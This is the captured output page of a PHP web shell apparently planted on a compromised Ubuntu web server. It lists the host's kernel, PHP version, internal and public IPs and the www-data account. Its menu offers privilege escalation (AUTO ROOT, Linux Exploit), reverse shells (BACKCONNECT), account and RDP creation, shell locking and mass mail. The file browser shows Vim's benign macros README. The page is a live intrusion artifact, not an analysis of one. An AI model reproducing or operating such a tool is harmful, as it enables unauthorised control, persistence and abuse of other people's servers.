Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.71.102
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
vim /
vim80 /
macros /
[ HOME SHELL ]
Name
Size
Permission
Action
hanoi
[ DIR ]
drwxr-xr-x
life
[ DIR ]
drwxr-xr-x
maze
[ DIR ]
drwxr-xr-x
urm
[ DIR ]
drwxr-xr-x
README.txt
1.09
KB
-rw-r--r--
editexisting.vim
124
B
-rw-r--r--
justify.vim
109
B
-rw-r--r--
less.bat
288
B
-rw-r--r--
less.sh
588
B
-rwxr-xr-x
less.vim
5.44
KB
-rw-r--r--
matchit.vim
124
B
-rw-r--r--
shellmenu.vim
115
B
-rw-r--r--
swapmous.vim
114
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.txt
The macros in the maze, hanoi and urm directories can be used to test Vim for vi compatibility. They have been written for vi to show its unlimited possibilities. The life macros can be used for performance comparisons. hanoi Macros that solve the tower of hanoi problem. life Macros that run Conway's game of life. maze Macros that solve a maze (amazing!). urm Macros that simulate a simple computer: "Universal Register Machine" The other files contain some handy utilities. They also serve as examples for how to use Vi and Vim functionality. less.sh + less.vim make Vim work like less (or more) The following have been moved to an optional package. Add the command to your vimrc file to use the package: packadd! dvorak " Dvorak keyboard support; adds mappings packadd! editexisting " when editing a file that is already edited with " another Vim instance, go to that Vim instance packadd! justify " justifying text. packadd! matchit " makes the % command work better packadd! shellmenu " menus for editing shell scripts in the GUI version packadd! swapmouse " swap left and right mouse buttons
Close